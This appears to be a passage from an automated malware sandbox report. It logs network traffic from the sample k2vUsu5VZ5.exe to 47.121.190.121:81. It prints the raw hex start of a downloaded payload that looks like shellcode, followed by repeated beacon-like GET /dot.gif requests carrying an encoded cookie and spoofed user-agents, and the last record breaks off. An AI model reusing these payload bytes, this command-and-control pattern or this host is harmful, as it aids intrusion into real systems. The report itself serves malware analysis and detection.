              Jan 9, 2025 18:30:38.760596037 CET5019181192.168.2.447.121.190.121
              Jan 9, 2025 18:30:38.761008978 CET5019281192.168.2.447.121.190.121
              Jan 9, 2025 18:30:38.765609026 CET815019147.121.190.121192.168.2.4
              Jan 9, 2025 18:30:38.765949011 CET815019247.121.190.121192.168.2.4
              Jan 9, 2025 18:30:38.766020060 CET5019281192.168.2.447.121.190.121
              Jan 9, 2025 18:30:38.766181946 CET5019281192.168.2.447.121.190.121
              Jan 9, 2025 18:30:38.771042109 CET815019247.121.190.121192.168.2.4
              Jan 9, 2025 18:30:39.776992083 CET815019247.121.190.121192.168.2.4
              Jan 9, 2025 18:30:39.777040005 CET815019247.121.190.121192.168.2.4
              Jan 9, 2025 18:30:39.779237986 CET5019281192.168.2.447.121.190.121
              Jan 9, 2025 18:30:39.779238939 CET5019281192.168.2.447.121.190.121
              Jan 9, 2025 18:30:39.784296989 CET815019247.121.190.121192.168.2.4
              Jan 9, 2025 18:30:39.885632038 CET5019381192.168.2.447.121.190.121
              Jan 9, 2025 18:30:39.891757011 CET815019347.121.190.121192.168.2.4
              Jan 9, 2025 18:30:39.891839027 CET5019381192.168.2.447.121.190.121
              Jan 9, 2025 18:30:39.891978025 CET5019381192.168.2.447.121.190.121
              Jan 9, 2025 18:30:39.896809101 CET815019347.121.190.121192.168.2.4
              Jan 9, 2025 18:30:40.921844959 CET815019347.121.190.121192.168.2.4
              Jan 9, 2025 18:30:40.921880960 CET815019347.121.190.121192.168.2.4
              Jan 9, 2025 18:30:40.921946049 CET5019381192.168.2.447.121.190.121
              Jan 9, 2025 18:30:40.921947002 CET5019381192.168.2.447.121.190.121
              Jan 9, 2025 18:30:40.922034025 CET5019381192.168.2.447.121.190.121
              Jan 9, 2025 18:30:40.926793098 CET815019347.121.190.121192.168.2.4
              Jan 9, 2025 18:30:41.026814938 CET5019481192.168.2.447.121.190.121
              Jan 9, 2025 18:30:41.032484055 CET815019447.121.190.121192.168.2.4
              Jan 9, 2025 18:30:41.033067942 CET5019481192.168.2.447.121.190.121
              Jan 9, 2025 18:30:41.033307076 CET5019481192.168.2.447.121.190.121
              Jan 9, 2025 18:30:41.038162947 CET815019447.121.190.121192.168.2.4
              Jan 9, 2025 18:30:41.996831894 CET815019447.121.190.121192.168.2.4
              Jan 9, 2025 18:30:41.996846914 CET815019447.121.190.121192.168.2.4
              Jan 9, 2025 18:30:41.996995926 CET5019481192.168.2.447.121.190.121
              Jan 9, 2025 18:30:41.996995926 CET5019481192.168.2.447.121.190.121
              Jan 9, 2025 18:30:41.997245073 CET5019481192.168.2.447.121.190.121
              Jan 9, 2025 18:30:42.002015114 CET815019447.121.190.121192.168.2.4
              Jan 9, 2025 18:30:42.104526043 CET5019581192.168.2.447.121.190.121
              Jan 9, 2025 18:30:42.112785101 CET815019547.121.190.121192.168.2.4
              Jan 9, 2025 18:30:42.112843037 CET5019581192.168.2.447.121.190.121
              Jan 9, 2025 18:30:42.112989902 CET5019581192.168.2.447.121.190.121
              Jan 9, 2025 18:30:42.121392965 CET815019547.121.190.121192.168.2.4
              Jan 9, 2025 18:30:43.074136019 CET815019547.121.190.121192.168.2.4
              Jan 9, 2025 18:30:43.074230909 CET815019547.121.190.121192.168.2.4
              Jan 9, 2025 18:30:43.075618982 CET5019581192.168.2.447.121.190.121
              Jan 9, 2025 18:30:43.075618982 CET5019581192.168.2.447.121.190.121
              Jan 9, 2025 18:30:43.083429098 CET815019547.121.190.121192.168.2.4
              Jan 9, 2025 18:30:43.183357000 CET5019681192.168.2.447.121.190.121
              Jan 9, 2025 18:30:43.191086054 CET815019647.121.190.121192.168.2.4
              Jan 9, 2025 18:30:43.191565037 CET5019681192.168.2.447.121.190.121
              Jan 9, 2025 18:30:43.192744017 CET5019681192.168.2.447.121.190.121
              Jan 9, 2025 18:30:43.200275898 CET815019647.121.190.121192.168.2.4
              Jan 9, 2025 18:30:44.161540031 CET815019647.121.190.121192.168.2.4
              Jan 9, 2025 18:30:44.161598921 CET5019681192.168.2.447.121.190.121
              Jan 9, 2025 18:30:44.162117004 CET815019647.121.190.121192.168.2.4
              Jan 9, 2025 18:30:44.162157059 CET5019681192.168.2.447.121.190.121
              Jan 9, 2025 18:30:44.276763916 CET5019681192.168.2.447.121.190.121
              Jan 9, 2025 18:30:44.277225018 CET5019781192.168.2.447.121.190.121
              Jan 9, 2025 18:30:44.281611919 CET815019647.121.190.121192.168.2.4
              Jan 9, 2025 18:30:44.282406092 CET815019747.121.190.121192.168.2.4
              Jan 9, 2025 18:30:44.282481909 CET5019781192.168.2.447.121.190.121
              Jan 9, 2025 18:30:44.282620907 CET5019781192.168.2.447.121.190.121
              Jan 9, 2025 18:30:44.287447929 CET815019747.121.190.121192.168.2.4
              Jan 9, 2025 18:30:45.265357018 CET815019747.121.190.121192.168.2.4
              Jan 9, 2025 18:30:45.265388966 CET815019747.121.190.121192.168.2.4
              Jan 9, 2025 18:30:45.267488956 CET5019781192.168.2.447.121.190.121
              Jan 9, 2025 18:30:45.271409988 CET5019781192.168.2.447.121.190.121
              Jan 9, 2025 18:30:45.276226997 CET815019747.121.190.121192.168.2.4
              Jan 9, 2025 18:30:45.395242929 CET5019881192.168.2.447.121.190.121
              Jan 9, 2025 18:30:45.400151014 CET815019847.121.190.121192.168.2.4
              Jan 9, 2025 18:30:45.406982899 CET5019881192.168.2.447.121.190.121
              Jan 9, 2025 18:30:45.407336950 CET5019881192.168.2.447.121.190.121
              Jan 9, 2025 18:30:45.412148952 CET815019847.121.190.121192.168.2.4
              Jan 9, 2025 18:30:46.395117044 CET815019847.121.190.121192.168.2.4
              Jan 9, 2025 18:30:46.395167112 CET5019881192.168.2.447.121.190.121
              Jan 9, 2025 18:30:46.395602942 CET815019847.121.190.121192.168.2.4
              Jan 9, 2025 18:30:46.395654917 CET5019881192.168.2.447.121.190.121
              Jan 9, 2025 18:30:46.510591030 CET5019881192.168.2.447.121.190.121
              Jan 9, 2025 18:30:46.511198044 CET5019981192.168.2.447.121.190.121
              Jan 9, 2025 18:30:46.515414000 CET815019847.121.190.121192.168.2.4
              Jan 9, 2025 18:30:46.516211987 CET815019947.121.190.121192.168.2.4
              Jan 9, 2025 18:30:46.516289949 CET5019981192.168.2.447.121.190.121
              Jan 9, 2025 18:30:46.516465902 CET5019981192.168.2.447.121.190.121
              Jan 9, 2025 18:30:46.521259069 CET815019947.121.190.121192.168.2.4
              Jan 9, 2025 18:30:47.485951900 CET815019947.121.190.121192.168.2.4
              Jan 9, 2025 18:30:47.485995054 CET815019947.121.190.121192.168.2.4
              Jan 9, 2025 18:30:47.489212036 CET5019981192.168.2.447.121.190.121
              Jan 9, 2025 18:30:47.489212036 CET5019981192.168.2.447.121.190.121
              Jan 9, 2025 18:30:47.494101048 CET815019947.121.190.121192.168.2.4
              Jan 9, 2025 18:30:47.607027054 CET5020081192.168.2.447.121.190.121
              Jan 9, 2025 18:30:47.612746954 CET815020047.121.190.121192.168.2.4
              Jan 9, 2025 18:30:47.612874985 CET5020081192.168.2.447.121.190.121
              Jan 9, 2025 18:30:47.613434076 CET5020081192.168.2.447.121.190.121
              Jan 9, 2025 18:30:47.619082928 CET815020047.121.190.121192.168.2.4
              Jan 9, 2025 18:30:48.583859921 CET815020047.121.190.121192.168.2.4
              Jan 9, 2025 18:30:48.583951950 CET815020047.121.190.121192.168.2.4
              Jan 9, 2025 18:30:48.584029913 CET5020081192.168.2.447.121.190.121
              Jan 9, 2025 18:30:48.584029913 CET5020081192.168.2.447.121.190.121
              Jan 9, 2025 18:30:48.625181913 CET5020081192.168.2.447.121.190.121
              Jan 9, 2025 18:30:48.630064964 CET815020047.121.190.121192.168.2.4
              Jan 9, 2025 18:30:48.745532990 CET5020181192.168.2.447.121.190.121
              Jan 9, 2025 18:30:48.750447989 CET815020147.121.190.121192.168.2.4
              Jan 9, 2025 18:30:48.750504017 CET5020181192.168.2.447.121.190.121
              Jan 9, 2025 18:30:48.750718117 CET5020181192.168.2.447.121.190.121
              Jan 9, 2025 18:30:48.755450964 CET815020147.121.190.121192.168.2.4
              Jan 9, 2025 18:30:49.749398947 CET815020147.121.190.121192.168.2.4
              Jan 9, 2025 18:30:49.749476910 CET815020147.121.190.121192.168.2.4
              Jan 9, 2025 18:30:49.749509096 CET5020181192.168.2.447.121.190.121
              Jan 9, 2025 18:30:49.750721931 CET5020181192.168.2.447.121.190.121
              Jan 9, 2025 18:30:49.855170012 CET5020181192.168.2.447.121.190.121
              Jan 9, 2025 18:30:49.855176926 CET5020281192.168.2.447.121.190.121
              Jan 9, 2025 18:30:49.860162020 CET815020147.121.190.121192.168.2.4
              Jan 9, 2025 18:30:49.860184908 CET815020247.121.190.121192.168.2.4
              Jan 9, 2025 18:30:49.860248089 CET5020281192.168.2.447.121.190.121
              Jan 9, 2025 18:30:49.860404015 CET5020281192.168.2.447.121.190.121
              Jan 9, 2025 18:30:49.865195990 CET815020247.121.190.121192.168.2.4
              Jan 9, 2025 18:30:50.825026989 CET815020247.121.190.121192.168.2.4
              Jan 9, 2025 18:30:50.825082064 CET815020247.121.190.121192.168.2.4
              Jan 9, 2025 18:30:50.825078011 CET5020281192.168.2.447.121.190.121
              Jan 9, 2025 18:30:50.825134039 CET5020281192.168.2.447.121.190.121
              Jan 9, 2025 18:30:50.825304031 CET5020281192.168.2.447.121.190.121
              Jan 9, 2025 18:30:50.830055952 CET815020247.121.190.121192.168.2.4
              Jan 9, 2025 18:30:50.933027029 CET5020381192.168.2.447.121.190.121
              Jan 9, 2025 18:30:50.937906981 CET815020347.121.190.121192.168.2.4
              Jan 9, 2025 18:30:50.938186884 CET5020381192.168.2.447.121.190.121
              Jan 9, 2025 18:30:50.938532114 CET5020381192.168.2.447.121.190.121
              Jan 9, 2025 18:30:50.943262100 CET815020347.121.190.121192.168.2.4
              Jan 9, 2025 18:30:51.904985905 CET815020347.121.190.121192.168.2.4
              Jan 9, 2025 18:30:51.905056000 CET5020381192.168.2.447.121.190.121
              Jan 9, 2025 18:30:51.905119896 CET815020347.121.190.121192.168.2.4
              Jan 9, 2025 18:30:51.905173063 CET5020381192.168.2.447.121.190.121
              Jan 9, 2025 18:30:52.011440039 CET5020381192.168.2.447.121.190.121
              Jan 9, 2025 18:30:52.011889935 CET5020481192.168.2.447.121.190.121
              Jan 9, 2025 18:30:52.016374111 CET815020347.121.190.121192.168.2.4
              Jan 9, 2025 18:30:52.016745090 CET815020447.121.190.121192.168.2.4
              Jan 9, 2025 18:30:52.016796112 CET5020481192.168.2.447.121.190.121
              Jan 9, 2025 18:30:52.017039061 CET5020481192.168.2.447.121.190.121
              Jan 9, 2025 18:30:52.021817923 CET815020447.121.190.121192.168.2.4
              Jan 9, 2025 18:30:52.958137035 CET815020447.121.190.121192.168.2.4
              Jan 9, 2025 18:30:52.958719969 CET815020447.121.190.121192.168.2.4
              Jan 9, 2025 18:30:52.958821058 CET5020481192.168.2.447.121.190.121
              Jan 9, 2025 18:30:52.961036921 CET5020481192.168.2.447.121.190.121
              Jan 9, 2025 18:30:52.965842009 CET815020447.121.190.121192.168.2.4
              Jan 9, 2025 18:30:53.073575974 CET5020581192.168.2.447.121.190.121
              Jan 9, 2025 18:30:53.079221964 CET815020547.121.190.121192.168.2.4
              Jan 9, 2025 18:30:53.079370022 CET5020581192.168.2.447.121.190.121
              Jan 9, 2025 18:30:53.079631090 CET5020581192.168.2.447.121.190.121
              Jan 9, 2025 18:30:53.084486961 CET815020547.121.190.121192.168.2.4
              Jan 9, 2025 18:30:54.033879995 CET815020547.121.190.121192.168.2.4
              Jan 9, 2025 18:30:54.033915997 CET815020547.121.190.121192.168.2.4
              Jan 9, 2025 18:30:54.034038067 CET5020581192.168.2.447.121.190.121
              Jan 9, 2025 18:30:54.034038067 CET5020581192.168.2.447.121.190.121
              Jan 9, 2025 18:30:54.034374952 CET5020581192.168.2.447.121.190.121
              Jan 9, 2025 18:30:54.039130926 CET815020547.121.190.121192.168.2.4
              Jan 9, 2025 18:30:54.247942924 CET5020681192.168.2.447.121.190.121
              Jan 9, 2025 18:30:54.252928019 CET815020647.121.190.121192.168.2.4
              Jan 9, 2025 18:30:54.253005028 CET5020681192.168.2.447.121.190.121
              Jan 9, 2025 18:30:54.286751032 CET5020681192.168.2.447.121.190.121
              Jan 9, 2025 18:30:54.291637897 CET815020647.121.190.121192.168.2.4
              Jan 9, 2025 18:30:55.272656918 CET815020647.121.190.121192.168.2.4
              Jan 9, 2025 18:30:55.272748947 CET815020647.121.190.121192.168.2.4
              Jan 9, 2025 18:30:55.273036957 CET5020681192.168.2.447.121.190.121
              Jan 9, 2025 18:30:55.273137093 CET5020681192.168.2.447.121.190.121
              Jan 9, 2025 18:30:55.277911901 CET815020647.121.190.121192.168.2.4
              Jan 9, 2025 18:30:55.390234947 CET5020781192.168.2.447.121.190.121
              Jan 9, 2025 18:30:55.395164013 CET815020747.121.190.121192.168.2.4
              Jan 9, 2025 18:30:55.397217035 CET5020781192.168.2.447.121.190.121
              Jan 9, 2025 18:30:55.397407055 CET5020781192.168.2.447.121.190.121
              Jan 9, 2025 18:30:55.402451038 CET815020747.121.190.121192.168.2.4
              Jan 9, 2025 18:30:56.360707045 CET815020747.121.190.121192.168.2.4
              Jan 9, 2025 18:30:56.360769033 CET5020781192.168.2.447.121.190.121
              Jan 9, 2025 18:30:56.360850096 CET815020747.121.190.121192.168.2.4
              Jan 9, 2025 18:30:56.360898018 CET5020781192.168.2.447.121.190.121
              Jan 9, 2025 18:30:56.464545965 CET5020781192.168.2.447.121.190.121
              Jan 9, 2025 18:30:56.464821100 CET5020881192.168.2.447.121.190.121
              Jan 9, 2025 18:30:56.469500065 CET815020747.121.190.121192.168.2.4
              Jan 9, 2025 18:30:56.469628096 CET815020847.121.190.121192.168.2.4
              Jan 9, 2025 18:30:56.469706059 CET5020881192.168.2.447.121.190.121
              Jan 9, 2025 18:30:56.469997883 CET5020881192.168.2.447.121.190.121
              Jan 9, 2025 18:30:56.474833965 CET815020847.121.190.121192.168.2.4
              Jan 9, 2025 18:30:57.441399097 CET815020847.121.190.121192.168.2.4
              Jan 9, 2025 18:30:57.441409111 CET815020847.121.190.121192.168.2.4
              Jan 9, 2025 18:30:57.441618919 CET5020881192.168.2.447.121.190.121
              Jan 9, 2025 18:30:57.442367077 CET5020881192.168.2.447.121.190.121
              Jan 9, 2025 18:30:57.447190046 CET815020847.121.190.121192.168.2.4
              Jan 9, 2025 18:30:57.561193943 CET5020981192.168.2.447.121.190.121
              Jan 9, 2025 18:30:57.566257954 CET815020947.121.190.121192.168.2.4
              Jan 9, 2025 18:30:57.566992044 CET5020981192.168.2.447.121.190.121
              Jan 9, 2025 18:30:57.567393064 CET5020981192.168.2.447.121.190.121
              Jan 9, 2025 18:30:57.572374105 CET815020947.121.190.121192.168.2.4
              Jan 9, 2025 18:30:58.527937889 CET815020947.121.190.121192.168.2.4
              Jan 9, 2025 18:30:58.528084993 CET815020947.121.190.121192.168.2.4
              Jan 9, 2025 18:30:58.528079987 CET5020981192.168.2.447.121.190.121
              Jan 9, 2025 18:30:58.528168917 CET5020981192.168.2.447.121.190.121
              Jan 9, 2025 18:30:58.635725975 CET5020981192.168.2.447.121.190.121
              Jan 9, 2025 18:30:58.636087894 CET5021081192.168.2.447.121.190.121
              Jan 9, 2025 18:30:58.644826889 CET815020947.121.190.121192.168.2.4
              Jan 9, 2025 18:30:58.645133018 CET815021047.121.190.121192.168.2.4
              Jan 9, 2025 18:30:58.645313025 CET5021081192.168.2.447.121.190.121
              Jan 9, 2025 18:30:58.645456076 CET5021081192.168.2.447.121.190.121
              Jan 9, 2025 18:30:58.654491901 CET815021047.121.190.121192.168.2.4
              Jan 9, 2025 18:30:59.657126904 CET815021047.121.190.121192.168.2.4
              Jan 9, 2025 18:30:59.657198906 CET815021047.121.190.121192.168.2.4
              Jan 9, 2025 18:30:59.657407045 CET5021081192.168.2.447.121.190.121
              Jan 9, 2025 18:30:59.657854080 CET5021081192.168.2.447.121.190.121
              Jan 9, 2025 18:30:59.662600994 CET815021047.121.190.121192.168.2.4

              HTTP Request Dependency Graph

              • 47.121.190.121:81

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.44973047.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:26:55.558100939 CET188OUTGET /r9dN HTTP/1.1
              User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; Touch)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:26:56.587992907 CET1236INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:26:56 GMT
              Content-Type: application/octet-stream
              Content-Length: 296007
              Data Raw: fc 48 83 e4 f0 eb 33 5d 8b 45 00 48 83 c5 04 8b 4d 00 31 c1 48 83 c5 04 55 8b 55 00 31 c2 89 55 00 31 d0 48 83 c5 04 83 e9 04 31 d2 39 d1 74 02 eb e7 58 fc 48 83 e4 f0 ff d0 e8 c8 ff ff ff 3f 59 49 58 3f dd 4d 58 72 03 08 0a 27 4b 81 ef 6f ca 6d cf 6f ca 6d 87 e2 d7 87 78 1d 28 cf f1 c2 60 4e 32 66 0e 4f 32 99 dd 0e 8a 69 68 ac dc 01 6c ac dc 01 36 e4 55 f8 c9 34 55 f8 c9 34 55 f8 c9 34 55 e8 c8 34 55 e6 d7 8e 5b e6 63 87 96 c7 db 86 da 0a fa d2 b2 63 89 f2 c2 11 e6 95 b0 70 8b b5 d3 11 e5 db bc 65 c5 b9 d9 45 b7 cc b7 65 de a2 97 21 91 f1 b7 4c fe 95 d2 62 f3 98 d8 46 f3 98 d8 46 f3 98 d8 c2 2d f6 07 02 92 f6 8b c2 2d f6 07 02 92 f6 8b a4 c3 38 07 65 7c 38 8b 86 2c ea 07 de 93 ea 8b 80 8c 2d 07 41 33 2d 8b 70 4a e2 07 99 f5 e2 8b a8 8c 2c 07 e1 33 2c 8b d0 4a e1 07 1a f5 e1 8b d3 32 72 07 18 8d 72 8b d8 32 73 07 cf 8d 73 8b 2c dd bd 07 da 62 bd 8b 7c 33 70 07 bd 8c 70 8b 1b dd ba 07 da 62 ba 8b 7c 33 76 07 bd 8c 76 8b ef e5 15 e3 2f 5a 15 6f 2f 5a 15 6f 2f 5a 15 6f 2f 5a 15 6f 2f 5a 15 6f 2f 5a 15 [TRUNCATED]
              Data Ascii: H3]EHM1HUU1U1H19tXH?YIX?MXr'Komomx(`N2fO2ihl6U4U4U4U4U[ccpeEe!LbFF--8e|8,-A3-pJ,3,J2rr2ss,b|3ppb|3vv/Zo/Zo/Zo/Zo/Zo/Zo/Zooovvv|22qqq,p,p,p,u,u,p,p,p,p,p,r-r-r-r-r-r-r-r-r-r-b-W-W-------------------.-d.-d.-d.-d.-(-(-(-(-(-(-(-:\UN\UUUNUJUJUJUJUJ58TYTTT^TTTTT`````L`L`L`L`L<]ii_i{i+i+i+i+)+Yh:5eu [TRUNCATED]


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.44973147.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:26:57.746829033 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:26:58.691802025 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:26:58 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.44973247.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:26:58.812841892 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:26:59.801598072 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:26:59 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.44973347.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:26:59.918812037 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:00.855838060 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:00 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.44973447.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:00.966552973 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:01.997495890 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:01 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              5192.168.2.44973547.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:02.217262030 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:03.325920105 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:03 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              6192.168.2.44973647.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:03.434497118 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:04.460484028 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:04 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              7192.168.2.44973747.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:04.599736929 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:05.551656961 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:05 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              8192.168.2.44973847.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:05.669267893 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:06.645804882 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:06 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              9192.168.2.44973947.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:06.762603998 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:07.726672888 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:07 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              10192.168.2.44974047.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:07.840800047 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:08.807055950 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:08 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              11192.168.2.44974147.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:08.918637991 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
